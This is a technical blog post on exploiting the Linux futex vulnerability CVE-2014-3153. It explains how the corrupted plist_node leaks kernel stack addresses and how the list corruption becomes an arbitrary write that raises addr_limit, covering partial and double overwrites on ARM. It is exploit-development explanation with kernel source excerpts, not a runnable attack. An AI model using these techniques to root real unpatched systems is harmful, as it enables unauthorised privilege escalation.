On exploiting CVE 2014-3153

14 April 2015

Introduction

This vulnerability has already been covered extensively. The purpose of this post is to discuss some exploitation details, mainly related to kernel structures corruption. For further details on the vulnerability context, see the references at the end.

Depending on which kernel version is used, either a list or red-black tree will be corrupted. In this post, we only focus on the list version.

Kernel stack node

The main idea behind this vulnerability, is the possibility for an attacker to partially control a node within a linked list. Partially because this node is on the kernel stack of a thread, and therefore the exact address/offset is hard to guess. The general approach used by towelroot and others is to fill the kernel stack with a single value. This value will override all the fields within the targeted structure. The exact structure is a plist_node:

struct plist_node {
        int                     prio;
        struct list_head        prio_list;
        struct list_head        node_list;
};

Here is the initial state once the stack has been corrupted:

Initial state

Here is a brief description from linux/plist.h on how the list is managed:

/*
 * Simple ASCII art explanation:
 *
 * pl:prio_list (only for plist_node)
 * nl:node_list
 *   HEAD|             NODE(S)
 *       |
 *       ||------------------------------------|
 *       ||->|pl|<->|pl|<--------------->|pl|<-|
 *       |   |10|   |21|   |21|   |21|   |40|   (prio)
 *       |   |  |   |  |   |  |   |  |   |  |
 *       |   |  |   |  |   |  |   |  |   |  |
 * |->|nl|<->|nl|<->|nl|<->|nl|<->|nl|<->|nl|<-|
 * |-------------------------------------------|
 *
 * The nodes on the prio_list list are sorted by priority to simplify
 * the insertion of new nodes. There are no nodes with duplicate
 * priorites on the list.
 *
 * The nodes on the node_list are ordered by priority and can contain
 * entries which have the same priority. Those entries are ordered
 * FIFO
*/

Kernel address leakage

In the original exploit, a value of prio < 0 is used. This will insert a new node after the corrupted kernel node. With prio < 0, the pointers of the corrupted node will be in the range 0x80000000-0xffffffff (remember the structure is overwritten with the same value). By allocating memory in userspace (e.g., at 0xa0000000), a fake userland node can be used:

Before node insertion

Note how we setup two nodes in userspace. Without the previous one, the insertion of a new node would fail. After the insertion, here is the state of the list:

After node insertion

Note how the corrupted node plays little role for the insertion. This is because list_add_tail only relies on the next node data:

static inline void list_add_tail(struct list_head *new, struct list_head *head)
{
        __list_add(new, head->prev, head);
}

static inline void __list_add(struct list_head *new,
                              struct list_head *prev,
                              struct list_head *next)
{
        next->prev = new;
        new->next = next;
        new->prev = prev;
        prev->next = new;
}

Both our userland nodes now contain references to the new node. This gives us the address of the kernel stack of the thread associated with the new node.

Kernel memory corruption

The other primitive required is the ability to modify or corrupt an arbitrary address. This can be achieved by using one of userland's node pointer. We start by inserting a node which has one pointer to the location we want to overwrite:

Corruption primitive - Before node insertion

When the node is inserted the memory is used as a list element:

Corruption primitive - After node insertion

Note how the arbitrary kernel memory now points to the new node. Next, we may delete that node: Corruption primitive - After node deletion

When deleted, the targeted memory will now point to our userland node. This primitive can be exploited with two different methods.

Partial overwrite

At the end of the corruption, the arbitrary kernel memory now points to a user space address. If we are targeting addr_limit, this is of little interest because the maximum value we may choose (0xbfffffff) is already below the default addr_limit. To overcome this issue, Dougall uses a partial overwrite. He will write a value such as 0xb000ffff at addr_limit+2. This has for effect to set addr_limit to 0xffffffff.

However, with a partial overwrite, whatever comes after will also be overwritten. On x86, a struct restart_block follows addr_limit. As this will only be used in corner-cases, it is unlikely that the partial overwrite has any negative colateral effect. Unfortunatly, the situation is quite different on ARM:

struct thread_info {
        unsigned long           flags;          /* low level flags */
        int                     preempt_count;  /* 0 => preemptable, <0 => bug */
        mm_segment_t            addr_limit;     /* address limit */
        struct task_struct      *task;          /* main task structure */
        struct exec_domain      *exec_domain;   /* execution domain */
        [...]
}

Having a corrupted task address will make your kernel die pretty quickly. One option from here is to be more careful and overwrite three bytes of addr_limit so that only the most significant byte of task is being modified. This is still possible with a userland address such as 0x00ffffff. In this case though, we are still corrupting one byte.

task_struct alignment

The tasks are being allocated via the SLAB allocator which is initialised in fork.c:

void __init fork_init(unsigned long mempages)
{
#ifndef CONFIG_ARCH_TASK_STRUCT_ALLOCATOR
#ifndef ARCH_MIN_TASKALIGN
#define ARCH_MIN_TASKALIGN      L1_CACHE_BYTES
#endif
        /* create a slab on which task_structs can be allocated */
        task_struct_cachep =
                kmem_cache_create("task_struct", sizeof(struct task_struct),
                        ARCH_MIN_TASKALIGN, SLAB_PANIC | SLAB_NOTRACK, NULL);
#endif
[...]

The task_struct will therefore be aligned on L1_CACHE_BYTES. On ARM, depending on the compilation options, this is between 6 (vexpress_defconfig) and 8 (goldfish_armv7_defconfig) bits. This means that in the worst case, only 2 bits are left unkown. Therefore, using a value of 0x00ffffff, we have at worst, one chance over four to overwrite the task's last byte with the correct value.

Double overwrite

The other method, used by towelroot, requires a bit more effort. Two threads with seperate nodes are used. The first one is inserted within the list and its kernel stack address leaked. Then, a second node is added targeting the addr_limit of the first thread. Depending on the order of the threads, we may fall in the case where the second node overwrite will give the first node access to its own addr_limit. The first node can then overwrite its own addr_limit to any value.

What if prio > 0 ?

Would such exploitation be possible for prio > 0 (and greater than the maximum priority)? In this case, any new node would be inserted before the corrupted node. This gives us the following state:

Initial state - prio > 0

We still manage to leak the address of the kernel stack, but all the addresses are evaluted from the corrupted node which gives us no control on the new node pointers. Interestingly, note how both prio_list and node_list of the new node points to prio_list of the fake userland node.

References